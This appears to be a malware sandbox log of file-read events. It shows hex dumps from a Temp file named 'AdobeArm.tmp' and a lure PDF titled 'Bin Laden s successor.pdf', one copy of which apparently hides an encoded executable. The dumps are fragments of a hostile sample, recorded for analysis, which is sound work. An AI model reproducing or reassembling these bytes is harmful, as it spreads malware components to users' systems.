C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp	none	1024	D1 C1 EA 10 33 70 FC 0F B6 D2 8B FE 89 75 E8 C1 EF 18 8B 3C BD 24 56 02 10 33 3C 95 24 52 02 10 8B 55 E0 C1 EA 08 0F B6 D2 33 3C 95 24 4E 02 10 0F B6 D3 33 3C 95 24 4A 02 10 8B D6 C1 EA 10 33 38 89 7D EC 0F B6 FA 8B D1 8B 3C BD 24 52 02 10 C1 EA 08 0F B6 D2 33 3C 95 24 4E 02 10 8B D3 C1 EA 18 C1 EB	success or wait	1	4FE025C
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp	none	1024	89 7D EC 8B 3C 8D 24 52 02 10 8B 4D DC 33 3C 9D 24 4E 02 10 C1 E9 18 33 3C 8D 24 56 02 10 0F B6 4D E0 33 3C 8D 24 4A 02 10 33 78 04 89 7D F0 8B CE 8B 75 E0 C1 E9 08 0F B6 C9 C1 EE 18 8B 1C 8D 24 4E 02 10 8B 4D DC 33 1C B5 24 56 02 10 83 C0 10 C1 E9 10 0F B6 C9 33 1C 8D 24 52 02 10 0F B6 CA C1 EA 18	success or wait	1	4FE025C
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp	none	1024	E9 10 0F B6 C9 33 3C 8D 4C 73 02 10 0F B6 CB C1 EB 18 33 3C 8D 4C 6B 02 10 8B 4D E0 8B 1C 9D 4C 77 02 10 C1 E9 10 0F B6 C9 33 78 08 33 1C 8D 4C 73 02 10 8B 4D DC C1 E9 08 0F B6 C9 33 1C 8D 4C 6F 02 10 0F B6 CA 33 1C 8D 4C 6B 02 10 8B 4D F0 33 58 0C 8B 45 0C 89 78 08 89 30 5F 89 58 0C 5E 89 48 04 5B	success or wait	1	4FE025C
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp	none	1024	00 10 FF 25 CC 70 00 10 FF 25 C4 70 00 10 56 8B F1 E8 1A 00 00 00 F6 44 24 08 01 74 07 56 E8 B5 FC FF FF 59 8B C6 5E C2 04 00 FF 25 14 71 00 10 FF 25 1C 71 00 10 CC CC 8D 4D E4 E9 53 E0 FF FF B8 50 72 00 10 E9 E0 FC FF FF CC CC 8D 4D E0 E9 3F E0 FF FF B8 78 72 00 10 E9 CC FC FF FF CC CC 8D 4D F0 E9	success or wait	1	4FE025C
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf	none	1024	25 50 44 46 2D 31 2E 34 0D 25 E2 E3 CF D3 0D 0A 31 35 20 30 20 6F 62 6A 20 3C 3C 2F 4C 69 6E 65 61 72 69 7A 65 64 20 31 2F 4C 20 34 31 36 37 33 2F 4F 20 31 38 2F 45 20 33 33 31 39 34 2F 4E 20 34 2F 54 20 34 31 33 32 36 2F 48 20 5B 20 36 37 36 20 32 30 37 5D 3E 3E 0D 65 6E 64 6F 62 6A 0D 20 20 20 20	success or wait	1	4FE044D
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf	none	1024	65 64 69 61 42 6F 78 5B 30 20 30 20 35 39 35 20 38 34 32 5D 2F 43 72 6F 70 42 6F 78 5B 30 20 30 20 35 39 35 20 38 34 32 5D 2F 52 65 73 6F 75 72 63 65 73 20 31 39 20 30 20 52 3E 3E 0D 65 6E 64 6F 62 6A 0D 31 39 20 30 20 6F 62 6A 3C 3C 2F 46 6F 6E 74 3C 3C 2F 54 54 31 20 32 30 20 30 20 52 2F 54 54 32	success or wait	1	4FE044D
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf	none	1024	54 79 70 65 2F 46 6F 6E 74 44 65 73 63 72 69 70 74 6F 72 20 32 36 20 30 20 52 2F 57 69 64 74 68 73 5B 32 35 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 32 35 30 20 33 33 33 20 32 35 30 20 32 37 38 20 35 30 30 20 35 30 30 20 35 30 30 20 30 20 30 20 35 30 30 20 35 30 30 20	success or wait	1	4FE044D
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf	none	1024	46 6C 61 67 73 20 33 34 2F 53 74 65 6D 56 20 38 32 2F 43 61 70 48 65 69 67 68 74 20 36 35 36 2F 58 48 65 69 67 68 74 20 30 2F 41 73 63 65 6E 74 20 38 39 31 2F 44 65 73 63 65 6E 74 20 2D 32 31 36 2F 49 74 61 6C 69 63 41 6E 67 6C 65 20 30 2F 46 6F 6E 74 46 61 6D 69 6C 79 28 54 69 6D 65 73 20 4E 65 77	success or wait	1	4FE044D
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf	none	1024	B6 7C 99 9F 17 44 05 4D E1 95 C8 AB 50 EB 43 5C 8B E8 4A F5 E4 E8 3F 23 71 F0 41 5E 64 67 FA 35 94 E9 DA 43 77 C0 B1 3B 7D 8E 8B 9C 55 E8 70 EF 35 03 B1 9E 6B DE 94 A2 BA 09 8D 67 4B FC 69 4A C8 27 2E 28 AB E1 EA 07 BB 75 28 59 A4 DB 49 74 36 3F 94 D3 0C 4C 91 BE 30 03 61 08 A8 1E A2 E7 A3 DE 92 43	success or wait	1	4FE044D
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf	none	1024	88 25 25 CE 9E 4E 12 EF 4F 90 23 E3 B6 BA A2 9A 90 2C 33 14 C8 2A 01 6C A1 88 2D 88 A1 BA 33 F9 6C 54 03 2E 94 C9 F2 64 E5 35 B1 82 30 66 4C 1C 37 2A 8A 8D AA 62 A7 61 AA 12 59 CE 8F C3 8C 17 B1 51 3D 48 91 09 CA 64 8D 19 81 EA CE 16 88 B8 E1 5C 16 53 C4 E5 C5 A0 4B A0 9E CC 8D 27 6B CD BA FD B8 D1	success or wait	1	4FE044D
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf	none	1024	7A B8 90 71 D9 C5 22 EF 4A 62 C5 64 97 EF 59 53 51 8A DB 90 93 7E C9 4E AD 81 BF D5 1B 72 BA 41 AA BB 5A 46 6A E4 2C 92 6D 50 7C EB BF 44 52 E5 77 24 71 10 40 DB 19 18 2D A0 19 34 91 1A 49 0D D3 69 FF 0E 46 91 50 68 C9 62 4E E3 A7 35 8D 9F EC 88 FF 40 A0 DC B5 BF 44 A0 DD A7 04 CA BE 72 46 02 FF A1	success or wait	1	4FE044D
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf	none	1024	40 DA C3 AB FD 52 80 2A 75 3A F0 35 BC D0 7C 2E BF BF C1 64 12 77 E4 89 81 51 71 21 7C 37 DB DA E5 CE 29 BA E8 80 D2 6B 75 D9 98 BD C3 BE C3 19 DE 43 5E 49 40 9B B3 62 55 BB 5C C4 6B 65 B6 0C 59 67 3E E7 5E D9 37 2F F8 11 C3 19 EA 88 06 33 19 2C 5E 9B 9F D9 B6 84 21 39 B2 E3 A5 91 A2 46 2B FF B1 34	success or wait	1	4FE044D
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf	none	1024	8C F4 1A 27 2A 35 AD F6 79 89 EE 57 03 81 91 4E 7F 3F 12 EB 4B 53 81 94 31 5D C6 C6 B0 BE E4 4E C3 F8 53 4D 76 4D F1 CE 37 62 AD 7E D7 66 1D 93 EA 30 37 B7 B2 36 48 71 DF 97 5A 16 AC CE 1C C9 C3 E9 D5 4C D7 73 23 8D C0 39 A6 3D E1 F4 D1 F2 BE 4B F4 FB 3D FA 18 EC C5 7A 8D 23 9C 57 F4 AE DF 9B 73 BC	success or wait	1	4FE044D
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf	none	1024	EE 66 37 59 52 96 87 7C D1 2D E5 2E 87 5D 93 26 21 84 97 3C 62 58 B3 0F 12 02 36 8F C5 DE 1B 1E EE 66 F3 A4 8D 8D 0F C2 2B 68 20 6A C2 E5 51 28 86 0A 42 40 2D A1 88 85 B3 C1 C2 46 45 90 F2 B2 8A A0 16 6D AB ED 47 BF 8F AF 1F 54 D1 56 3E 5B 2A 92 ED 9C 73 77 37 9B 7C C0 5F BD CF 99 DF CC 99 33 67 66	success or wait	1	4FE044D
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf	none	1024	AF 61 26 0F C1 61 08 73 FC 4E B2 5B E1 07 A3 78 77 1C E9 81 D7 E1 0D AC 90 B7 E0 18 76 9A E3 78 C6 90 23 88 1D 8D A2 27 38 A6 F1 C7 E1 77 C8 33 2D 8D 3B 05 A7 B1 43 FD 1E DE 85 F7 E0 1C 9C 44 EE 7D FE 3C 83 DC 79 F8 10 3E 82 4F 84 54 A4 3E 80 2B F8 BC 89 37 38 67 56 3D BC 70 C1 FC 79 15 8A 3C D7 57	success or wait	1	4FE044D
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf	none	1024	83 55 D0 4A 51 C7 4C 4A E1 48 C4 27 DB CE 5A AF 2A 36 2C B5 F9 78 57 C8 34 39 13 7B BF C1 3E 0B F5 66 B2 DB 8F F0 4C DA 12 0C 30 3F 60 AE CC C6 1A ED 45 41 05 CB 36 66 10 55 8A 68 32 5A 48 8E 5A 40 0D 2F 1F C3 CA 11 07 05 31 37 98 40 3E BE 05 19 DA A2 50 25 93 4D 2A D7 2B BC 9C 2D 14 0A C9 34 4C BB	success or wait	1	4FE044D
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf	none	1024	E9 63 F3 A0 07 E7 6A 30 FE C9 F3 0F 22 42 9C 24 4E 3C 8E 07 D5 65 44 A8 D5 DD 83 EF 3A 22 90 CC FA FE 43 F7 E0 7D D6 93 67 FD B8 85 A4 90 5A 5F D7 77 44 36 22 D2 3C 86 31 9D 91 6B B8 27 35 21 B2 0B 0F 21 DB 27 E0 C6 B1 58 21 0B B0 48 56 B3 56 5B 30 4D FC 0D E5 22 D5 8D 09 E2 18 66 18 27 30 44 EC E6	success or wait	1	4FE044D
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf	none	1024	0F 21 32 C8 7E 92 04 26 61 67 47 98 6B 95 41 9C 68 FF E6 2A B0 99 AC 15 AB F8 4C AB 90 23 36 61 2E 59 2D 26 73 5F 9D CC 7C 12 0E 93 D2 FF 75 1E E7 7A 81 AC 21 D5 A4 4A 1D C6 52 35 91 FD 40 10 4B C8 44 E3 24 B6 C9 31 D8 66 D2 93 4C 7A 53 E0 53 42 DF 08 4C F0 A2 75 00 87 1C F8 FF B3 C6 FC 0E 1E 35 5B	success or wait	1	4FE044D
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf	none	1024	CE 58 C6 58 CA 58 C2 58 CC 58 C4 58 C8 58 C0 98 CF 98 C7 98 CB 98 C3 98 CD 98 C5 98 C9 98 C1 98 CE 98 C6 98 CA 98 C2 98 CC 98 C4 98 C8 98 C0 18 CF 18 C7 18 CB 18 C3 18 CD F8 97 F1 0F E3 6F C6 5F 8C 51 8C 3F 19 23 19 1C 7B 14 C7 1E C5 B1 47 71 EC 51 1C 7B 14 C7 1E C5 B1 47 71 EC 51 1C 7B 14 C7 1E C5	success or wait	1	4FE044D
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf	none	1024	94 07 E5 74 B0 FC FF 5D 95 C5 AE 8C B6 36 11 4A 83 52 DA 9A FC 47 A3 24 70 6A 6B 55 A1 84 B6 36 16 8A 6B 6B 53 A1 18 9E 15 05 45 B4 35 AF 50 18 6F 16 D2 D6 E4 DF 58 41 6D 4D FE 6F B3 00 C8 8F CF F3 E1 57 C8 0B F2 E0 B2 DC 20 17 2E CB 09 72 80 EC 20 9B B6 26 FF 5B CA 0A B2 E0 CE CC B8 33 13 2E CB 88	success or wait	1	4FE044D
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf	none	1024	DE 86 AC CE 2C 2D 90 D5 10 6C 0D 64 95 55 B6 2A 5D 0C 11 25 6E 0E BA 83 B5 07 C5 5B DC AA 1F 65 4A A9 4C 25 B2 67 AA A7 DB EF 6F 3B E2 50 5D 6D 93 8E B5 83 93 B2 7B 72 51 B7 B9 0F AC 1B 98 B4 ED 9E 54 BD 03 83 7D 53 22 B7 F4 4F 89 16 EC 99 CC 6D 5B 37 30 3B BE 69 62 42 15 35 B5 4D 16 75 F7 DD AD EF	success or wait	1	4FE044D
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf	none	1024	9A F7 28 F4 7A 67 EF 35 DD A1 52 9B 34 A5 A5 A5 A5 A5 A5 A5 A5 A5 A5 A5 A5 A5 A5 A5 A5 A5 BD D8 94 53 DD C5 5E 57 E6 16 B6 F6 66 6D 57 67 18 89 9A DD AA 65 28 55 EB CA 29 7B 52 75 06 F5 DE 54 6D A3 3E 90 AA ED 6A A7 DC 6B DE 25 63 0E 33 85 5A 7D AA D6 94 53 EB 4E D5 3A F3 A1 54 9D 41 BD 33 55 DB A8	success or wait	1	4FE044D
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf	none	1024	0A 48 89 C4 55 09 50 53 D7 1A 3E 37 09 5B 20 2C 06 10 09 60 88 C8 BE 9C CB 22 A0 11 41 50 D4 02 2A 01 E1 29 02 21 06 12 59 92 26 61 A7 48 22 B2 48 2D 56 04 04 17 52 C0 05 A4 A0 22 2A 45 40 2A 6A 61 40 8B F2 1C 90 2A B6 F0 C0 05 05 71 A1 D4 11 DE 0D 4B 4B 7D F3 9E 9D 37 F3 E6 9D 33 77 CE FC DF 7F FE	success or wait	1	4FE044D
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf	none	1024	48 9C CF 02 AF 08 55 65 A0 9A 8C 8B 80 29 40 1E CB 10 B3 35 08 58 65 96 2F 81 8B E7 EB 1B 4F 56 F1 63 B8 61 85 E6 64 85 5A 39 D8 7D A4 0A BC 58 0C 36 45 4E 3E 0B FC DE 43 0F CD 4E 2C B2 28 68 96 54 21 F7 F5 BC 3A CF ED 0F 8C E9 57 34 2B 0B FE A1 3D 8F 3C 4C F0 25 8D 7A 9A D8 00 A7 73 83 6D 79 3E C5	success or wait	1	4FE044D
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf	none	1024	5C F4 E3 4A CB 66 95 BA 40 E3 96 F5 C3 44 17 A7 02 CB 0A 53 E7 33 23 1B F7 AE 1D 48 57 6B 28 8E F2 67 56 49 52 BE 09 B5 8A F7 7A 5A 74 71 D7 AA E2 2D 7A A8 A2 91 66 49 C5 F0 D7 16 3A 43 AB 8F B0 34 43 03 E5 D8 25 FA 8E BE 99 13 A7 47 0F E3 6E 52 EE 35 FB AF AB CD 4E 6B 5E 39 E2 77 D8 A7 FA C3 E9 A4	success or wait	1	4FE044D
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf	none	1024	A0 42 30 09 30 00 86 80 27 60 0B A8 02 CA 20 E3 86 F0 D9 F0 1D 1A 20 CB 57 81 45 0D C2 A1 DB 96 73 B9 81 31 BB A1 57 B3 D4 65 77 C7 19 19 D1 CF 88 28 85 30 5B F5 17 74 19 4B 36 D8 86 03 F0 65 39 2D E5 A7 C5 33 BB 2F 74 0C D5 19 1B 66 16 73 3F 69 19 9D 4E 5E 32 2E D1 BA AA 29 32 92 B5 AB CF F7 F9 02	success or wait	1	4FE044D
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf	none	1024	26 E4 A1 06 92 09 A3 20 C7 D7 84 BA 07 86 A2 85 43 EB 0C BD B4 9E 66 37 97 9E 1E 8E 62 A2 61 D8 7C 85 0A 86 80 86 FE AD C4 88 DA 06 6E AD E5 04 85 BF 35 44 A0 A0 73 DB 02 9B EF 37 F8 FD 91 62 00 52 49 56 F2 70 89 86 FF DD 59 2C 88 DF D2 84 09 65 0B 9E 4C 96 0D 44 43 39 DC 06 38 0D 38 41 D9 DC 0D BA	success or wait	1	4FE044D
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf	none	1024	BF 07 07 89 B5 12 43 07 40 CF 16 48 BC 4A 61 11 9E E4 66 BC 9F 86 0D B0 05 8E C2 A7 78 E6 5B 90 DA 06 BB A1 13 F6 01 C5 7F 14 DE 81 4F E0 5B BC 7A 96 EB 1B 60 80 EE 30 24 C3 10 80 C8 37 91 6B 3D 9D F8 86 D1 D3 5E 64 0B 72 43 92 A4 5E 24 62 8E 7C D1 0F FB A2 67 4B C4 DC 13 4E 1E 0C A9 7C 6E 9A F8 21	success or wait	1	4FE044D
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf	none	1024	F9 41 87 3B 31 29 76 B7 2A 57 D7 D0 91 3E 4B 35 D6 67 8D 24 5B AC D4 A1 60 F8 14 22 07 15 96 25 62 A6 99 17 71 39 2B 5F 91 CF C2 BD F5 D3 8E 29 B3 9D 1B 6C 46 49 16 2D 3A 85 65 0B 01 C9 83 1F 52 58 80 02 33 A6 8B B3 2C A3 85 05 92 2C 58 20 A6 86 AB 44 35 18 D5 C7 0E 32 3A 9B B3 88 89 74 6C AA B3 C8	success or wait	1	4FE044D
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf	none	1024	B9 4C F6 71 3E 44 91 8A E7 6F 11 BB 90 3A 8B DA 27 43 47 DE DF B8 80 07 49 6C E3 F1 15 B4 6D 8A 1D 8F 57 5A 8B 7A 16 F1 A1 AE 18 D1 1C 95 80 FE 9C AB 6B 0B DE C4 B0 80 2F 79 F1 DF F8 62 6B B1 67 BB EF 6B 94 42 9D 3C 83 C5 F7 42 CD 43 1D 59 A0 56 63 A0 46 AE E7 D8 F5 BC 16 3F 76 0F E8 4B 1E 26 A3 82	success or wait	1	4FE044D
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf	none	1024	DE 7A 4E C2 01 6F 3D 97 06 AC E2 1A 25 40 36 E9 1D 0B 9C F9 FC 8D 77 90 66 EB FE 2A 20 E8 07 A7 E8 5E AF B1 DF BA 0C E9 7C 46 2E F8 7D 63 48 DE E9 E3 D4 4D 7F 9D 75 9F 6A 7A 2F DE A7 CF 71 EE 0B 55 FE 5A DB 5D 38 E6 06 59 8E 95 CE C7 9C A3 2B F5 DF D1 D6 89 65 4C 26 85 98 A3 0A 50 18 8A A2 5E C6 FE	success or wait	1	4FE044D
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf	none	1024	C0 88 52 23 E6 1B 51 62 44 B1 11 F3 8C 98 6B 44 91 11 85 46 14 18 91 6F 44 9E 11 B9 46 CC 31 62 B6 11 B3 8C C8 31 22 DB 88 2C 23 66 1A 31 C3 88 4C 23 FE 4B 63 5D 87 37 95 B4 61 18 EF 50 B4 69 A0 81 A4 48 DA 1E DC 5D 83 17 2B 52 68 29 F4 E0 4E A1 B8 04 82 07 0A 2C CB 0A EE EE 1E 74 70 77 77 77 77 77	success or wait	1	4FE044D
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf	none	1024	3C FB 8A DD 17 F0 19 7C 02 1F 75 86 58 E1 83 CE 50 5F 78 8F DD 3B F0 16 BC C1 B3 D7 D8 BD 02 2F C1 0B 3C 7B 0E 9E E1 F0 29 78 02 1E 83 47 78 E5 21 76 0F B0 BB 8F DD 3D 70 17 DC C1 B3 DB E0 16 0E 6F 82 1B E0 3A B8 86 57 AE 62 77 05 5C D6 E9 1B 0A 97 74 FA 06 C2 45 70 01 87 E7 C1 39 70 16 9C C1 2B A7	success or wait	1	4FE044D
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf	none	1024	3F 78 94 CF A3 AA 7A 54 61 8F 4A E2 E7 09 F2 64 F6 F8 07 F6 36 DD 66 2F 9F DB F4 73 D7 75 27 B8 D7 BA 93 96 5D EB BE E3 4E E2 E7 56 01 5B 7E EF 59 EF 76 86 45 88 E1 83 DC D6 A0 88 9E 66 77 B3 87 AF BB D9 AD 7D 57 B3 93 FC 58 1D 5D F1 66 07 5F BC D9 DE 15 67 B6 F3 C5 99 6D 5D 6D CC D6 AE 56 66 4B 57	success or wait	1	4FE044D

+ File read
File Path	Offset	Length	Value	Completion	Count	Source Address
C:\Bin Ladens successor.pdf	none	1024	4D 48 82 12 11 12 12 12 16 12 12 12 ED ED 12 12 AA 12 12 12 12 12 12 12 52 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 CA 12 12 12 1C 0D A8 1C 12 A6 1B DF 33 AA 13 5E DF 33 46 7A 7B 61 32 62 60 7D 75 60 73 7F 32 71 73 7C 7C 7D 66 32 70 77	success or wait	1	4FE0203
C:\Bin Ladens successor.pdf	none	1024	47 99 FE AA 06 30 12 12 FA 11 1B 12 12 41 44 45 AB 50 12 12 12 AC 02 22 52 12 9F AF 46 F4 ED ED 9F 97 9A E1 ED ED E1 B7 42 FA A0 17 12 12 91 D6 16 97 D2 1D 96 58 16 12 12 AB 92 12 12 12 21 D2 9F AF A2 E9 ED ED 9F 87 A2 E9 ED ED E1 B9 9F 5F EA D5 57 EA 12 13 12 12 43 40 ED 07 12 32 52 12 99 27 3A 32	success or wait	1	4FE0203
C:\Bin Ladens successor.pdf	none	1024	52 12 9F 97 E2 EF ED ED 78 12 9F 9F B2 E5 ED ED 42 43 ED C4 FB D1 12 12 12 99 27 92 32 52 12 78 76 ED C4 78 76 ED C4 9F 87 C6 F4 ED ED 40 FA DF 12 12 12 91 D6 16 9B 97 96 E1 ED ED 97 D2 66 CD 9F 97 66 FF ED ED 42 ED 07 9A 32 52 12 97 D2 66 3C 7A 0A 23 52 12 42 ED 07 9E 32 52 12 99 E2 97 E4 66 0E 9F	success or wait	1	4FE0203
C:\Bin Ladens successor.pdf	none	1024	36 06 2E 12 12 12 D5 56 36 32 EE 23 52 12 9B 46 36 36 9B 56 36 3A D5 56 36 0A 52 12 12 12 ED C5 99 27 7A 32 52 12 42 ED C4 99 0F 76 32 52 12 78 1D ED C1 99 3F 72 32 52 12 42 ED C7 9F 5E 36 02 43 ED 07 FE 32 52 12 97 D2 66 53 99 46 36 5A 78 52 40 ED C4 99 56 36 5A 78 13 42 ED 07 4E 32 52 12 9F 5E 36	success or wait	1	4FE0203
C:\Bin Ladens successor.pdf	none	1024	84 34 12 12 12 12 12 12 4E 31 12 12 7A 31 12 12 68 31 12 12 94 31 12 12 88 31 12 12 A2 31 12 12 AE 31 12 12 DA 31 12 12 C6 31 12 12 F2 31 12 12 E0 31 12 12 16 36 12 12 32 36 12 12 22 36 12 12 54 31 12 12 58 36 12 12 4A 36 12 12 7A 36 12 12 64 36 12 12 94 36 12 12 8A 36 12 12 BA 36 12 12 D0 36 12 12	success or wait	1	4FE0203
C:\Bin Ladens successor.pdf	none	1024	61 66 45 12 7E 12 51 60 77 73 66 77 46 7D 7D 7E 7A 77 7E 62 21 20 41 7C 73 62 61 7A 7D 66 12 12 F2 13 55 77 66 44 77 60 61 7B 7D 7C 57 6A 45 12 E7 13 55 7E 7D 70 73 7E 54 60 77 77 12 12 85 11 45 60 7B 66 77 54 7B 7E 77 12 42 12 51 60 77 73 66 77 54 7B 7E 77 45 12 49 10 5E 7D 71 79 40 77 61 7D 67 60	success or wait	1	4FE0203
C:\Bin Ladens successor.pdf	none	1024	12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 7F 12 61 12 7C 12 3C 12 7D 12 74 12 74 12 7E 12 7B 12 7C 12 77 12 65 12 77 12 70 12 62 12 73 12 75 12 77 12 3C 12 71 12 7D 12 7F 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 7F 12 61 12 7C 12 3C 12 7D 12 74 12 74 12 7E 12 7B 12 7C 12	success or wait	1	4FE0203
C:\Bin Ladens successor.pdf	none	1024	12 12 12 12 12 12 12 12 12 12 12 12 13 12 13 12 B2 12 12 92 32 12 12 92 02 12 12 12 2A 12 12 92 12 12 12 12 12 12 12 12 12 12 12 12 12 12 13 12 74 12 12 12 42 12 12 92 12 12 12 12 12 12 12 12 12 12 12 12 12 12 13 12 13 12 12 12 7A 12 12 92 12 12 12 12 12 12 12 12 12 12 12 12 12 12 13 12 1B 16 12 12	success or wait	1	4FE0203
C:\Bin Ladens successor.pdf	none	1024	12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12	success or wait	1	4FE0203
C:\Bin Ladens successor.pdf	none	1024	99 3F AE 62 12 02 4B 91 6E 36 06 12 66 5E 44 78 12 ED 66 36 0E FA 46 5E 12 12 ED 66 36 32 FA 05 19 12 12 91 D6 02 ED 66 36 06 ED C7 99 C2 41 9B 46 36 06 ED C7 99 5E 36 02 11 DA 93 EB ED ED 12 12 6F 15 ED 66 36 06 41 ED C5 ED 66 36 06 FA 35 5E 12 12 99 3F AE 62 12 02 4B 91 6E 36 0A 12 66 5E 44 78 12	success or wait	1	4FE0203
C:\Bin Ladens successor.pdf	none	1024	12 12 6F 23 9F 97 E2 EF ED ED 42 ED 67 1A ED 07 A6 62 12 02 ED 57 EA 44 44 44 9F 57 E6 44 42 9F 97 E2 E9 ED ED 42 D5 57 E6 12 10 12 12 ED 67 EA ED 67 EE F9 97 ED 67 EE ED 07 0A 62 12 02 4D 49 4C DB D1 47 99 FE 91 FE 3A 9F 57 EE 42 7A 0B 12 10 12 78 12 7A 2A 97 12 02 7A 10 12 12 92 ED 07 06 62 12 02	success or wait	1	4FE0203
C:\Bin Ladens successor.pdf	none	1024	12 02 43 9F 5F EA 43 9F 5F E2 43 9F 9F FA BD ED ED 7A 12 5A 12 12 43 78 11 78 22 42 9B 4F E2 9B 4F EA 9B 4F FA ED C4 97 D2 67 3F 99 57 E2 9F 5F FA 43 9F 5F EA 43 9F 5F E2 17 12 5A 12 12 43 42 9F 97 FA BD ED ED 42 78 11 78 22 ED 67 FE ED C4 97 D2 1D 96 86 13 12 12 7A 8A 9A 12 02 7A 9A 9A 12 02 7A 62	success or wait	1	4FE0203
C:\Bin Ladens successor.pdf	none	1024	9B 4F EA 42 9F 97 FA EF ED ED 42 45 45 7A 86 9B 12 02 ED 67 E2 ED 07 12 62 12 02 97 D2 1D 97 A9 10 12 12 9F 97 FA EF ED ED 7A 06 58 10 02 42 ED 07 22 62 12 02 97 D2 1D 96 B3 10 12 12 9F 97 FA EF ED ED 7A 9A 9B 12 02 42 ED C4 9F 97 FA EF ED ED 42 ED 67 1A ED C4 7A 42 10 12 12 9F 97 8A E9 ED ED 45 42	success or wait	1	4FE0203
C:\Bin Ladens successor.pdf	none	1024	12 1D 94 C9 13 12 12 91 D2 1E 9B 57 EE 99 57 EE 41 78 12 99 52 EA 9B 57 FE 9F 97 AA E9 ED ED 42 FA 5B 2E 12 12 91 D6 1E ED 67 FE ED 07 6E 63 12 02 42 9F 97 AA E9 ED ED 7A 02 9E 12 02 42 FA 9B 2E 12 12 45 9F 97 AA E1 ED ED 78 12 42 FA 0E 2E 12 12 9F 97 AA E9 ED ED 42 FA 04 2E 12 12 42 9F 97 AA E9 ED	success or wait	1	4FE0203
C:\Bin Ladens successor.pdf	none	1024	ED ED 42 FA AC 2A 12 12 91 D6 3E 9F 97 AA E1 ED ED 42 ED 67 1A ED C4 ED 57 EA 99 57 E2 99 5F EA 91 57 EE 06 29 1A 1D 90 9D EC ED ED 99 57 E2 42 FA 57 2A 12 12 4B 4D 4C 49 DB D1 47 99 FE 93 FE 86 1B 12 12 41 44 45 21 C9 AB ED 13 12 12 21 D2 9F AF 7C E4 ED ED 99 27 A6 62 12 02 74 9B 8F 7E E4 ED ED 7A	success or wait	1	4FE0203
C:\Bin Ladens successor.pdf	none	1024	49 DB D1 47 99 FE 91 FE 26 41 44 45 78 32 ED 67 1A 9F 57 DE 21 E4 42 9B 67 EE FA D7 26 12 12 91 D6 1E 9F 5F EE 9B 67 C2 78 10 4A 43 9F 5F DE 43 44 44 42 9B 57 DE 9B 57 CA FA D8 25 12 12 97 D2 1D 97 8A 12 12 12 2B 67 EE 1D 96 9D 12 12 12 91 5F EA ED AA 12 3A 12 12 42 9B 57 E2 FA 6F 26 12 12 99 EA 4B	success or wait	1	4FE0203
C:\Bin Ladens successor.pdf	none	1024	E5 EB 91 D0 53 74 9B 05 55 55 ED 5F 1A 67 A4 4D 74 91 36 61 12 7A 1A 10 12 12 9F 97 FA EF ED ED 78 12 42 FA 54 22 12 12 91 D6 1E 9F 97 FA EF ED ED 41 42 ED 07 A2 62 12 02 ED 67 1E 9F 97 FA EF ED ED 42 7A CA 9F 12 02 41 FA 60 22 12 12 91 D6 02 4C 49 DB D1 47 99 FE 93 FE 7E 1A 12 12 41 44 AC ED ED 12	success or wait	1	4FE0203
